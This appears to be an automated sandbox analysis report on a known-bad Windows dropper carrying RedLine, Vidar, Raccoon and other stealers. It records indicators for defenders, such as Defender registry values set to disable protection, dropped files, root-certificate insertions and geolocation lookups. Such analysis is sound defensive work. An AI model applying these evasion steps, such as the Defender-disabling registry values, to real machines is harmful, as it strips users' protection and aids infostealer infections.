Malware Analysis Report

2024-11-13 19:46

Sample ID 220806-tj3gzagdgl
Target CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe
SHA256 cb7d7fe72bdc9b5c0da00a175ad4354037473b71f8a9fd763d798c84c44467c0
Tags
onlylogger privateloader redline socelars vidar 706 media26 aspackv2 discovery evasion infostealer loader main spyware stealer trojan dcrat raccoon 109c5b577d4bc7aa7c26c1a8a3b55988 @hfcdvjjdsxvb @stealfate druwe persistence rat vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cb7d7fe72bdc9b5c0da00a175ad4354037473b71f8a9fd763d798c84c44467c0

Threat Level: Known bad

The file CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe was found to be: Known bad.

Malicious Activity Summary

onlylogger privateloader redline socelars vidar 706 media26 aspackv2 discovery evasion infostealer loader main spyware stealer trojan dcrat raccoon 109c5b577d4bc7aa7c26c1a8a3b55988 @hfcdvjjdsxvb @stealfate druwe persistence rat vmprotect

RedLine

Process spawned unexpected child process

OnlyLogger

Socelars

Modifies Windows Defender Real-time Protection settings

Socelars payload

PrivateLoader

DcRat

RedLine payload

Vidar

Raccoon

Raccoon Stealer payload

Looks for VirtualBox Guest Additions in registry

Vidar Stealer

OnlyLogger payload

ASPack v2.12-2.42

Executes dropped EXE

Downloads MZ/PE file

Looks for VMWare Tools registry key

VMProtect packed file

Loads dropped DLL

Checks BIOS information in registry

Checks computer location settings

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Adds Run key to start application

Maps connected drives based on registry

Looks up geolocation information via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Enumerates processes with tasklist

Modifies system certificate store

Creates scheduled task(s)

Checks SCSI registry key(s)

Script User-Agent

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-06 16:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-06 16:06

Reported

2022-08-06 16:08

Platform

win7-20220715-en

Max time kernel

109s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A

OnlyLogger

loader onlylogger

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Socelars

stealer socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Vidar

stealer vidar

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue072fdbb8e4b2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07a633a94f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\SetupMX_1.bmp.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-335065374-4263250628-1829373619-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\CB7D7FE72BDC9B5C0DA00A175AD4354037473B71F8A9F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07816149b72db00.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue078a285ef7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07caa83bac5d15.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07267c17f2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07e35cf558.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DUP9L.tmp\Tue07e35cf558.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1672 set thread context of 2176 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0750373995e75.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e1900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue071e59dc8292b4ef1.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue07006d6b7c.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue070aab9bc86b572.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D31384C\Tue0741bc096fd881d2.exe N/A
